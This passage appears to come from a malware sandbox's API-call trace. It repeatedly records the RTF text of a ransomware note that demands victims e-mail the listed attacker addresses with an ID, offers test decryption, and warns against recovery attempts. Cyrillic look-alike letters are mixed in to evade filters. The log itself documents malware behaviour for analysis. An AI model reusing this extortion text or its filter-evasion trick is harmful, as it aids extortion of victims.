d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 